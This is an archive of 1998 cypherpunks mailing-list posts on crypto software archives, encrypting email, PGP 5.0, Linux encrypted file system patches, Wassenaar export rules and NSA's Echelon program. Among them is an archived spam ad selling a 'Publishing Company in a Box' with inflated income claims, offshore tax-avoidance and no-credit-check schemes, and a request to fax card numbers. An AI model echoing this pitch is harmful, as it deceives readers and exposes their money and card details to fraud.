> I'm done with this discussion. You want to expect people to put their neck
> on the line and you use their services while owning them nothing then wonder
> why nobody does it, so be it.

Let me ask you some clear questions and please give me also clear
answers:

If there is some person who is grown up and is not metally ill
and who decides to volunteer to put up an archive site of crypto
software for the benefit of those who need them, what do you have
against that? Any reasonable person who plans to do some business 
(for profit) certainly well considers the possible risks he might
have. For non-profit activities like what we are discussing it is 
clear that one is much more careful before launching the work. Why 
do you want to disuade him from doing that? If he fails, that's his 
fate but you don't loose a cent because of that. If he puts up a 
site and that has to be closed down after a couple of months because 
of unforeseen new crypto laws, you at least profit in that short 
time period of the possibility of downloading from his site and other 
people also profit from that. If his country has poor economy 
(inflation, unemployment etc. leading possibly to early depletion of 
his monetary resources) or bad infrastucture (total breakdown of 
telecommunication of his country, rendering his site no longer 
operable) or religion (because he is physically injured by religious 
fanatics and therefore unable to work), or whatever other reasons
than these three that you mentioned, that's all HIS business not
YOURS. He, being in his own country, should know all such risks much
much better than you! Be happy that because of him you have one 
more possibilty of obtaining your desired software (during the time
his site is operational)! If he ever gets into trouble, it will be 
fine of you if you will try to help him, through raising funds etc. 
But you are not obliged to do that.

So I don't understand the motivation of your arguing up till now. 
I would be able to understand if you were working in an authority 
attempting to strengthen the effects of crypto laws, thus wishing 
to have as few archive sites in the world as possible, at best none. 
(Of course, I know absolutely nothing of you. Should I happen to 
have made here a wrong assumption about your occupation, then I like 
to offer my sincere apology.)

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Sat, 12 Dec 1998 03:13:10 +0800
To: cypherpunks@cyberpass.net
Subject: 2nd reposting of a response to Enzo Michelangeli (on crypto archives)
Message-ID: <36715D15.D0C67C2D@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Note: There was some technical problem since yesterday to cypherpunks
postings, so that my posts to the list didn't result in copies back to 
me. This morning I reposted these, again without success. An hour
ago Igor Chudov informed me that the problem was solved and I have
just verified this with a test message. I am therefore reposting 
once again one of my posts of yesterday here (not exactly identical
to the original, being reconstructed from memory). It is a response 
to Enzo Michelangeli. Please ignore it if you have already seen it.

Enzo Michelangeli wrote:
 
> It would be helpful if the list included the approximate size in Mb of each
> archive. I'm making arrangements for some mirrors here in Hong Kong, and I
> need an estimate of the space needed.

I don't know. But a number of years ago I accessed some archive sites 
of software for processing of Asian languages. From that and the
fact that modern disks have become much bigger in capacity and cheaper,
I suppose that storage shouldn't be a bottleneck.

I like to take the opportunity to mention a non-trivial issue that
happens to have refreshed my attention by a reader's letter in a
computer journal, namely that software at public archives could be
infected by virus. I suppose one should give this potential risk
some consideration, since in the present context there could be
some third party particularly interested in disrupting the goals
of crypto archives.

Another point I like to raise is what to archive, i.e. whether only
program texts (which are small) or also executable files, and how
to let the archive contents be up-to-date. Related to this is
whether the archive owner has to fetch everything himself or there is
also a directory for uploading by contributors (this is the case
with the archives I mentioned above and is sensible for new software
and for updates.)

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Wenzler <rwenzler@usachoice.com>
Date: Sat, 12 Dec 1998 08:57:26 +0800
To: "'cypherpunks@toad.com>
Subject: Re: Postcard Debates
In-Reply-To: <199812111341.IAA15146@mailfw1.ford.com>
Message-ID: <3671B447.16498817@usachoice.com>
MIME-Version: 1.0
Content-Type: text/plain





"Wilson, Jamie (J.R.)" wrote:
> 
> If everyone just encrypted their messages then no suspicions would be raised
> regarding the use of encryption.  Most people use envelopes, plain and
> simple -- and as a result no one questions what they are hiding.  It's
> understood that mail is private and therefore people have a right to seal it
> in an envelope and not worry about people tampering with it.  On the same
> note, there are federal regulations and penalties (in the U.S. anyway) for
> tampering with mail and interrupting the delivery of it.  The same laws
> should apply to email.

Right. If everyone used encryption, there would not as much public
debate about it.

For now, it is not commonly used and viewed as secrative.

Now for a general question to all that may read this: How much are
you willing to do something to change the laws?
However much people are willing to stick up for this issue is the
amount things could change.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Wenzler <rwenzler@usachoice.com>
Date: Sat, 12 Dec 1998 11:05:46 +0800
To: "'cypherpunks@toad.com>
Subject: Re: Postcard Debates
In-Reply-To: <199812112135.QAA13074@mailfw2.ford.com>
Message-ID: <3671C566.58034F05@usachoice.com>
MIME-Version: 1.0
Content-Type: text/plain





"Wilson, Jamie (J.R.)" wrote:
> 
> Back to a previous question: how do we get the public to understand the
> concept of an "electronic envelope", the ACLU has created a PDF file that
> prints to a brochure format explaining encryption on a level that even the
> novice of users can understand.  It is available at
> http://www.aclu.org/action/tools/crypto.pdf.

Getting that concept across is a slow process. People will want to
stay with what they are familiar with. Right now, I do not know how
to familiarize people to accept an electronic envelope.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Sat, 12 Dec 1998 11:06:25 +0800
To: Reeza! <howree@cable.navy.mil>
Subject: Re: PGP Inc has gone to the dogs
In-Reply-To: <3.0.5.32.19981212031015.00a74d90@205.83.192.13>
Message-ID: <199812120127.UAA005.88@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

In <3.0.5.32.19981212031015.00a74d90@205.83.192.13>, on 12/12/98 
   at 03:10 AM, Reeza! <howree@cable.navy.mil> said:

>Cleaning out the dross, I found this.

>What was "broken" in pgp50?


In doing my port of 5.0 to OS/2 I found and patched a couple of minor bugs
in pgp, none of them security related. I don't know what Adam is refering
to as "broken" except perhaps the change in the commandline so 5.0 doesn't
work with 2.6.x scripts & plugins.



>At 10:16 AM 10/18/98 +0100, Adam Back wrote:
>>
>>PGP Inc has taken leave of it's sense.  Masses of untrue claims on web
>>pages (take a look at examples below), no RSA support, no unix
>>versions (other than old broken pgp50).


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: DOS=HIGH? I knew it was on something...

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i OS/2 for non-commercial use
Comment: Registered_User_E-Secure_v1.1b1_ES000000
Charset: cp850

wj8DBQE2cbiMlHpjA6A1ypsRApwYAJ9/JOVfvaFqCWH4z9pE8ntBQyn3qwCgj7Uo
GzSrbEYZoWwbGM1u2zJSwHY=
=s57Y
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Sat, 12 Dec 1998 13:45:09 +0800
To: mikeg@soonernet.com
Subject: Re: Linux Encrypted File Sytem
In-Reply-To: <XFMail.981211124103.mikeg@soonernet.com>
Message-ID: <3.0.5.32.19981211211036.03ec7dd0@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 12:41 PM 12/11/98 -0600, Mike Gorsuch wrote:
>
>Hey guys,
>
>I'm hoping that you guys can point me in the right direction.  I have become
>very interested in the idea of an encrypted file system, rather than
encrypting
>individual files.  I read an article in the Linux Journal that talked
about how
>to give Linux the support.  Well, first I had to get the source for an older
>kernel, 2.0.30, and use the patches.  It patched and compiled fine. Next I
was
>supposed to patch mount.  The problem I am facing is that the mount source
will
>not take the patch right.  
>
>If anyone can help me on these two issues I would be very happy:
>
>1) What source version of mount do I need to use?
>
>2) Is there a way to get kernel 2.0.35 or later to use this support?

There is a set of Kernel patches at
ftp://ftp.kerneli.org/pub/linux/kerneli/v2.1/ . Look for the patch-int files.

Note: I have not been able to get these to compile cleanly.  It may take
some work to get them to work right.  (I know of at least one typo in
devices/block/loop_gen.c that prevents it from compiling on the patch for
2.1.131.)

---
|      Bill Clinton - Bringing back the Sixties one Nixon at a time!     |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|                                                  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexander Kjeldaas <astor@guardian.no>
Date: Sat, 12 Dec 1998 06:53:31 +0800
To: cypherpunks@toad.com
Subject: Re: Linux Encrypted File Sytem
In-Reply-To: <XFMail.981211124103.mikeg@soonernet.com>
Message-ID: <19981211224423.A13974@lucifer.guardian.no>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, Dec 11, 1998 at 12:41:03PM -0600, Mike Gorsuch wrote:
> Hey guys,
> 
> I'm hoping that you guys can point me in the right direction.  I
> have become very interested in the idea of an encrypted file system,
> rather than encrypting individual files.  I read an article in the
> Linux Journal that talked about how to give Linux the support.
> Well, first I had to get the source for an older kernel, 2.0.30, and
> use the patches.  It patched and compiled fine. Next I was supposed
> to patch mount.  The problem I am facing is that the mount source
> will not take the patch right.

I'm maintaining the international kernel patch for Linux which aims to
collect all crypto-related features for the Linux kernel in one easy
patch.  This patch is tracking the development version of Linux, not
the stable one.  The patch is available from:

ftp://ftp.kerneli.org/pub/Linux/kerneli/v2.1/

The loopback modules currently supports the following ciphers: serpent
(cbc), mars (cbc), rc6 (cbc), dfc (cbc), blowfish (cbc), cast-128
(ecb), and twofish (cbc).

This code is changing rapidly, so if you feel uneasy about development
versions of the kernel, this might not be for you until it has become
a bit more stable.

> If anyone can help me on these two issues I would be very happy:
> 
> 1) What source version of mount do I need to use?
> 

If you patch linux-2.1.131 (the latest release) with
patch-int-2.1.131.1.gz you can look in the Documentation/crypto
directory for some mount-patches.  However I intend to make a newer
patch with support for more of the cipher algorithms - and against the
latest util-linux.

> 2) Is there a way to get kernel 2.0.35 or later to use this support?
> 

If you want to use the stable kernel, you can look at
ftp://ftp.kerneli.org/pub/Linux/kerneli/net-source/loop/ for a
collection of loop-crypto patches against 2.0.x.

You can also look into tcfs available at 
ftp://ftp.kerneli.org/pub/Linux/kerneli/net-source/tcfs/
This is basically crypto-support for NFS which is more integrated than
CFS (the T in TCFS stands for 'transparent').

astor

-- 
 Alexander Kjeldaas, Guardian Networks AS, Trondheim, Norway
 http://www.guardian.no/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexander Kjeldaas <astor@guardian.no>
Date: Sat, 12 Dec 1998 06:54:11 +0800
To: Ulf Mller <cryptography@c2.net
Subject: Re: German government press release on Wassenaar
In-Reply-To: <v04020a1bb2941c8e1795@[139.167.130.246]>
Message-ID: <19981211225004.B13974@lucifer.guardian.no>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, Dec 09, 1998 at 08:04:00PM +0100, Ulf Mller wrote:
> 
> 2.) The government has acknowledged that public domain software
> remains unrestricted. This also applies to copyrighted software such
> as PGP which "has been made available without restrictions upon its
> further dissemination".

I applied for an examination of the Open Source definition to the
department for foreign affairs in Norway.  The response (no surprise)
was that Open Source is compliant with what the Wassenaar-agreement
calls "public domain" software.

astor

-- 
 Alexander Kjeldaas, Guardian Networks AS, Trondheim, Norway
 http://www.guardian.no/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Sat, 12 Dec 1998 14:04:49 +0800
To: Reeza! <howree@cable.navy.mil>
Subject: RE: Postcard Debates
In-Reply-To: <3.0.5.32.19981212115057.00a85560@205.83.192.13>
Message-ID: <Pine.SOL.4.05.9812120020490.18785-100000@eos01du.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 12 Dec 1998, Reeza! wrote:

>> Date: Sat, 12 Dec 1998 11:50:57 +1000
>> From: Reeza! <howree@cable.navy.mil>
>> To: "cypherpunks@toad.com" <cypherpunks@toad.com>
>> Subject: RE: Postcard Debates
>> 
>> This would open the door for the USPS to charge for each email sent. 
>> The same rules? No. Based on those rules, but not the same rules.
>> The same rules would slow email down considerably also, wouldn't they???<g>
>> 
>> Reeza!

Funny you should mention the USPS and email.  I was browsing through 
the latest issue of PC WEEK (12-07-98), and noticed the following 
paragraph in Spencer Katt's column "Rumor Central" on page 178 - 

     "A self-proclaimed 'project mis-manager' was chatting with a 
buddy who's done some development work for the U.S. Postal Service.
His pal was talking about a new project in which the USPS will 
accept electronic documents, merge them with a mailing list, print
them at the post office branch closest to the destination of each
document's recipient and deliver them for less than the price of a 
snail mail stamp.  The kicker: Microsoft is considering an add-in
that will put a USPS 'Mail' button in Office 2000 for directly
linking to the service."


it's pure evil.

Regards,

Ken Williams

Packet Storm Security        http://www.Genocide2600.com/~tattooman/
E.H.A.P. Head of Operations  http://www.ehap.org/   ehap@ehap.org
NC State CS Dept  http://www.csc.ncsu.edu/   jkwilli2@unity.ncsu.edu
PGP DSS/DH/RSA Keys          http://www4.ncsu.edu/~jkwilli2/pgpkey/

___________________________________________________________________ 
Get Your Email Sniffed and Decrypted for Free at http://www.nsa.gov




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Sat, 12 Dec 1998 07:31:04 +0800
To: Adam Back <cypherpunks@cyberpass.net
Subject: Re: PGP Inc has gone to the dogs
In-Reply-To: <199810180916.KAA24934@server.eternity.org>
Message-ID: <3.0.5.32.19981212031015.00a74d90@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



Cleaning out the dross, I found this.

What was "broken" in pgp50?

Reeza!


At 10:16 AM 10/18/98 +0100, Adam Back wrote:
>
>PGP Inc has taken leave of it's sense.  Masses of untrue claims on web
>pages (take a look at examples below), no RSA support, no unix
>versions (other than old broken pgp50).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joel O'Connor" <ogrenivek@yahoo.com>
Date: Sat, 12 Dec 1998 06:19:21 +0800
To: "Wilson, Jamie \(J.R.\)" <jwilso37@visteonet.com>
Subject: RE: Postcard Debates
Message-ID: <19981211174713.26279.rocketmail@send105.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Deep. . .mad deep.  I completely agree, does anyone know of any such
laws regarding e-mail?
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2

iQA/AwUBNnFaV1MQ9C083U98EQIkFwCcDqbpZqgR0wehfhGufe8Rqzr8ZKcAoNH8
xVqePuZTtRuBALc2NSfiM3BS
=kkN5
-----END PGP SIGNATURE-----





---"Wilson, Jamie (J.R.)" <jwilso37@visteonet.com> wrote:
>
> If everyone just encrypted their messages then no suspicions would
be raised
> regarding the use of encryption.  Most people use envelopes, plain and
> simple -- and as a result no one questions what they are hiding.  It's
> understood that mail is private and therefore people have a right to
seal it
> in an envelope and not worry about people tampering with it.  On the
same
> note, there are federal regulations and penalties (in the U.S.
anyway) for
> tampering with mail and interrupting the delivery of it.  The same
laws
> should apply to email.
> 
> ____________________________________________________
> Jamie R. Wilson                     
> 
> 
> 
> -----Original Message-----
> From: Robert Wenzler [mailto:rwenzler@usachoice.com]
> Sent: Thursday, 10 December, 1998 13:56
> To: Mbishop645@aol.com
> Cc: maven@weirdness.com; hab@gamegirlz.com; Cypherpunks@toad.com
> Subject: Re: 
> 
> 
> 
> 
> Mbishop645@aol.com wrote:
> > 
> > >HaB wrote:
> > ><snip>
> > >>     That's a good place to begin, though.  "Would you send a
letter to
> > >> someone without an envelope?"  "Then why not put your email in
the
> > >> electronic equivalent of one?"
> > >>
> > >> balance.
> > >
> > >Would I send a letter to someone without an envelope?
> > >One word: postcard.
> > 
> > Ahh, but would you tape a check for your phone bill to a postcard?
Other
> > than writing a greeting to someone what else do you use a postcard
for?
> 
> No, I would not tape a phone bill check to a postcard. There is the 
> chance for it to fall off.
> 
> There is different methods of sending mail for different levels of
> security and functionality. Some people make it obvious what is inside
> an envelope. (who would not recognize a Christmas card from the
> envelope?) Others make it as bland and normal as possible to
> have it go by without much notice.
> 
> It all depends on how secure you want it. Some things you can do
> with what amounts to postcard security.
> 
> What amount of security do you want for your email? Would you be
> willing to do something extra for that security?
> 
> This type of question is up to each person. How much risk is the
> person willing to take. Each person has the responsibility to
> understand what the risks are and to decide what risks they are
> willing to take.
> 

==
Ogre bounces like sonar. . .Peace.
                  Ogre

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: info@save-net.com
Date: Sat, 12 Dec 1998 17:07:13 +0800
Subject: ADV: Save Up To 50% on International Calling
Message-ID: <199812120857.CAA00327@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text/plain



Message sent by: ITC Int'l Callback, 25 Tarhelia Lane, Whittier, NC 28789,
1-828-497-6282. To be removed, click reply with "remove" in the subject.


		Save Up To 50% on International Calling

.. for residents inside AND outside the USA.

Here is a sample of some of our rates FROM the USA To:

COUNTRY	RATE		(US$)  Per Minute Rates

Australia	.23
Brazil		.65
Canada		.14
China		.75
France		.23
Germany	.23
India		.79
Philippines	.55
Russia		.50
Taiwan		.47
United Kingdom	.14

- Rates apply 24 hrs/day, 7 days per week
- NO sign-up fees, and NO monthly fees
- You DO NOT have to SWITCH your current provider
- Calling Card at same rates with NO SURCHARGES
- Same rates apply to mobile phones, with no surcharges
- Ideal for Home, Business, and mobile phone

- For residents OUTSIDE the USA, we have INT'L CALLBACK
  Contact us for our low callback rates.

Contact us for more information 
and complete rate table at: 		     	 info@save-net.com

For SERVICE information, type "info" in the subject line.

Thank You!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer77497@aol.com
Date: Sat, 12 Dec 1998 19:29:21 +0800
Subject: Publishing Company For Sale
Message-ID: <c13f2533.367248e7@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



See information about Free Credit Application Below!

My Multi-Million Dollar 
Publishing Company 
ONLY $149

Free Pre-Approved Merchant Account Application with Order!! 
To Start Your Business Out Right!!

If you ever wanted "the easy way out" to make a lot of money
with a business of your own....
Here is the EASIEST WAY TO START!

I'm writing this letter to let you in on something that'll blow
you away. What I'm about to present is something I've 
never done before...something that I'll never do again....
So PAY ATTENTION!

For the past few years...I've have been running ads in 
newspapers & magazines, by direct mail, and throughout 
the internet.  These ads were always small and very cheap...

On these ads, we have been selling little manuals.  These 
manuals have sold for anywhere between $10 to $99 each.  
We always ran different ads for each manual we were selling.  

I like selling information because NOBODY can put a price on 
it...ESPECIALLY when it is your own...The Sky is the Limit!

Plus it is very cheap to reproduce How-To manuals.  It costs 
between 40 cents and $3 to print the entire print manuals and 
around 35 cents to copy the manuals on disk.  AND you can 
sell them for up to $99 each.   That is one hell of a markup!

These manuals tell you how to get a car with no money down 
and no credit...another one tells you how to avoid taxes by 
depositing income offshore...now you may not be interested in 
saving money by going offshore...but believe me....there are 
MILLIONS OF PEOPLE WHO DO...and they are willing to pay 
me to teach them!!! 

Well this is where the unbelievable offer comes in...I hope you
are sitting down for this one...because this is a once in a 
lifetime chance for you.  I do not know of an easier way to 
become financially independent...In fact THERE IS NO EASIER WAY!!! The next
few paragraphs will reveal everything to you.

I am willing to sell you my entire informational product line 
with FULL REPRINT RIGHTS and complete step-by-step 
instructions on how to start your mail order information business with very
little money. 

Remember, these are PROVEN WINNERS.  If you are 
stumped on something to sell or if you are having trouble 
writing a good ad, I have also included an entire book on 
disk to help you produce KILLER ads!

This entire package which I call a Publishing Company in a 
Box will come on 1 CD containing over 2000 'Hot-Selling' 
Books, Reports And Manuals ready to print and sell, Sell, 
SELL! It also will come with a signed letter giving YOU FULL 
REPRINT RIGHTS allowing you to sell them for as much as 
you want and however you want.  You Can even sell the entire
kit to someone else to resale on their own!  You also receive 
copies of KILLER ads which can fill your mailbox with cash!

I am not even going to ask you for any of the money either...
What you make is yours to keep .  In fact...you get to make a 
ton of money on these manuals for as long as you wish...and 
you will never have to pay me another red cent in royalties!

I am even going to print out and prepare our #1 selling report 
which contains the secrets of obtaining credit without a credit
check and producing an offshore income without taxes so that 
you will be able to take it down to your local copy shop and be ready to sell
it the same day you have received it. Watch out though - one individual is
making $70,000 a month on this 
report alone!  (Why - Because you can include a FREE 
offshore credit application for those with bad or no credit with 
this report and explode your mailbox with orders) Note: THIS 
APPLICATION IS INCLUDED!

All I ask for is...$149 and I will include FREE Priority Mail 
Shipping!  Yes, I said $149.  There are no zeros missing.  
Plus if you order before Dec. 18th I will include 4 extra 
special bonuses...

Bonus #1 - "Search Engine Magic" on disk.  This report will 
shoot your web site up to the top of the search engine listings.
Other web advertisers are selling this manual for $99 by 
itself - But I will give it to you for FREE with this package.

Bonus #2 - The report "How to Make at least $1,600 a week 
online...Starting Now!" which is taking the internet by storm 
will be included absolutely FREE! 

Bonus #3 - I will include special details about a secret source
for direct mail leads that can produce cash orders along with 
out KILLER ads.  And another source will be given which 
allows you to advertise nationwide through newspapers to 
70,000,000 readers for as low as 7 cents per word.

Bonus #4 - I also will include a pre-approved application for 
a merchant account for your business benefit.  Taking credit 
cards will increase your business up to 100%.  The normal 
$195 application fee will be waved with this pre-approved 
application.  

But there is one drawback... I am sending this ad to 10,000 
other people...and I will only allow 50 kits to be sold.  It 
wouldn't make much sense if I sold this kit to 1,000 or 2,000 
people...The market would be saturated with these same 
manuals... and I don't want to do that.  To make sure that the 
people in this offer get the same results I have...ONLY 50 
people can have it for $149.00!

Chances are, I will get all 50 within a week's time.  So if  this is 
something you are interested in...RUSH me a check or money
order for $149.00 TODAY to insure your future business.

But, even if you decide to pass this up...Don't sweat it.  It's
not like I am going to be mad or anything like that.  I know I 
will get my 50 order limit really fast.  And anyone who gets 
their check into me late... I will simply send it back.

For only $149.00, I am going to let you have the easiest money you will ever
make.  The manuals are written, the ads are presented, the advertising plan is
laid out, and all you have to do is print them out for pennies and place the
ads.

Do it today! Rush me your payment of $149.00 right now...and 
get your very own MILLION DOLLAR publishing company going!

You can start with one or two manuals...even the day you 
receive the package...and then expand to include ALL of them!

For $149.00, you have everything you need to make a killing 
with your very own business.  If you want to make real 
money - then this offer is for you!

"I took the report "Search Engine Magic" and sold over 50 
copies on disk within 2 weeks! They sold for $99 and I was 
able to copy them for under 50 cents each.  Wait till I start 
marketing the other products included in this line!!!"
Joe Fisher - Internet Marketer

To rush order this "MILLION DOLLAR Publishing Company in 
a Box" simply fill out the order form below and fax it to our 24 
hour  order line at:

FAX ORDER LINE:
1 (212) 504-8032

Regular Mail to:
Financial Systems
P.O. Box 301
Orange, Ma 01364

ORDER FORM
--------------------------------------------------------------
Please send to:

Your Name__________________________________________
 
Your Address________________________________________
 
Your City____________________________________________
 
State / Zip___________________________________________
 
Phone #: ____________________________________________
(For problems with your order only. No salesmen will call.)
 
Email Address_______________________________________

We Accept Checks or Money Orders along with all Major Credit Cards including
Visa, MasterCard and American Express.  (NOTE - We only ship to the address
listed on the credit card)

(Please Fill Out Below Section and Make sure that the above name and address
are listed as it appears on the card) for $149.00

Credit Card Number:________________________________

Expiration Date:___________________________

Signature:_________________________

Date:____________________

[  ] YES! Please rush my Publishing Company in a Box.  I 
understand I have FULL REPRINT Rights and can sell any of 
the items for whatever price I desire, even the entire kit.

[  ] DOUBLE YES!  I am ordering by Dec. 18th!  Please include 
the extra special bonuses!

* Please check one of the following payment options:
[  ] I am faxing a check (Do not send original, we will make a 
draft from the faxed check)

[  ] I am faxing my credit card number. (Note your card will be 
charged for $149.00 and we only ship to the address on the card)

[  ] I am enclosing a check or money order for $149.00!

Note - If ordering outside continental US, please add $5 to S&H

P.S. Don't forget you will receive 2,000 Manuals, Books, and 
Reports (Some of which are up to 200 pages each)...all for 
$149...You have full reprint and resale rights to make as much 
money as you want without ever paying any royalties whatsoever!


* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
You have been carefully selected to receive the following as 
a person obviously interested in this subject based upon your 
previous internet postings, or visits to one of our affiliate web 
sites.  If you have received this message in error, reply with 
the word unsubscribe in the subject.
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 12 Dec 1998 16:23:10 +0800
To: cypherpunks@Algebra.COM
Subject: RE: Postcard Debates
Message-ID: <199812120801.JAA05848@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



postcard not private?  nobody reads them?  just
this last week click and clack (you know, the car
guys on NPR) received a $20 bill in the mail.  no
envelope - just a $20 bill with a stamp and their
address written on the face.  amazing but true. 
source:
http://cartalk.cars.com/Radio/Show/RAfiles/9849/s07.ram
- real audio required.

EnvelopeMonger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mib <mib@io.com>
Date: Sat, 12 Dec 1998 23:45:49 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: CFS & TCFS (was Re: Linux Encrypted File System)
Message-ID: <19981212092708.C25653@io.com>
MIME-Version: 1.0
Content-Type: text/plain



If you are running Red Hat Linux and want the Cryptographic File System (also
available for most BSD-derived Unix systems and most current Linux releases),
go to http://www.replay.com/redhat/cfs.html                               

If you are running Linux 2.0.X and want the Transparent Cryptographic File
System (improves on Matt Blaze's CFS, they say), go to           
http://vales.uni.net/tcfs/                                              

- d.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 12 Dec 1998 23:54:12 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: German government press release on Wassenaar (fwd)
Message-ID: <199812121546.JAA00764@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 12 Dec 1998 15:33:10 +0100
> From: "Albert P. Franco, II" <apf2@apf2.com>
> Subject: Re: German government press release on Wassenaar (fwd)

> I think the key idea which allows Open Source to be exempted is based on
> the availability to all eyes of the technology--not the legal rights
> attached to the software.
> 
> The fact that the knowledge contained in Open Source software is available
> to all is the key. The legal right to use that knowledge is not quite the
> issue. If the knowledge in the software becomes "common knowledge" then
> defining its (illegal) export becomes extremely difficult.

The problem I see with this is that the knowledge about the crypto system
doesn't come from the source but rather from the mathematics that it is
founded upon.

If this line of reasoning is followed to its logical conclusion then
publishing a paper on the algorithm also transmits that knowledge making
particular knowledge of the software (ie whether I used a do-loop instead of
a if statement) rather irrelevant. Now if it's not the particulars of the
implimentation that we're protecting and it's not the mathematics itself
then exactly what is it that we're protecting by imposing these closed
source limitations? It looks to me like an unintentional(?) attempt to put
commercial closed source crypto out of business. Under these regulations
doesn't it mean that any business that isn't OS faces additional hurdles in
its operation? Any business that is OS faces the problem of income stream
which still isn't completely worked out for OS companies. This implies a
longer time to market for OS crypto products.

Also, since the source of PGP has always been avaiable doesn't this now make
it permissible to export without restriction?


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 13 Dec 1998 00:58:00 +0800
To: cypherpunks@toad.com
Subject: Echelon, Diana, Wassenaar
Message-ID: <199812121635.LAA05204@smtp0.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



The Wash Post today has picked up the hot European
story of NSA's file on Princess Diana and linked it to
the NSA's Echelon program.

   http://jya.com/nsa-diana.htm

This is the first US major media story on Echelon, and its
connection to privacy invasion of a global celebrity icon 
may do more to get public attention for the vile program
than any previous investigation and report.

NSA claims Diana was not a "target" and that the 1,000 pages
of data on her were gathered "incidental" to other activities. 
But, as with all the TLA snooping, it is this incidental 
surveillance of the innocent that all the calls for loosening of
encrypton controls  is about.

After all the near-futile efforts of investigators to bring 
Echelon out into the open, and counterefforts of pols
and spooks cloak it, the Diana hook may the "Gone
With The Wind" popularizer that finally energizes
a genuine borad-based opposition, and, may very well 
be the kickoff to global demand for encryption to protect 
privacy worldwide and maybe even in the US.

What wonderful cloubreak to let sunshine into the dark
halls of Wassenaar and FT Meade spookdoms.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Sat, 12 Dec 1998 12:01:01 +0800
To: "cypherpunks@toad.com>
Subject: RE: Postcard Debates
In-Reply-To: <199812111341.IAA15146@mailfw1.ford.com>
Message-ID: <3.0.5.32.19981212115057.00a85560@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



This would open the door for the USPS to charge for each email sent. 
The same rules? No. Based on those rules, but not the same rules.
The same rules would slow email down considerably also, wouldn't they???<g>

Reeza!



At 08:41 AM 12/11/98 -0500, Wilson, Jamie (J.R.) wrote:
>If everyone just encrypted their messages then no suspicions would be raised
>regarding the use of encryption.  Most people use envelopes, plain and
>simple -- and as a result no one questions what they are hiding.  It's
>understood that mail is private and therefore people have a right to seal it
>in an envelope and not worry about people tampering with it.  On the same
>note, there are federal regulations and penalties (in the U.S. anyway) for
>tampering with mail and interrupting the delivery of it.  The same laws
>should apply to email.
>
>____________________________________________________
>Jamie R. Wilson                     
>
>
>
>-----Original Message-----
>From: Robert Wenzler [mailto:rwenzler@usachoice.com]
>Sent: Thursday, 10 December, 1998 13:56
>To: Mbishop645@aol.com
>Cc: maven@weirdness.com; hab@gamegirlz.com; Cypherpunks@toad.com
>Subject: Re: 
>
>
>
>
>Mbishop645@aol.com wrote:
>> 
>> >HaB wrote:
>> ><snip>
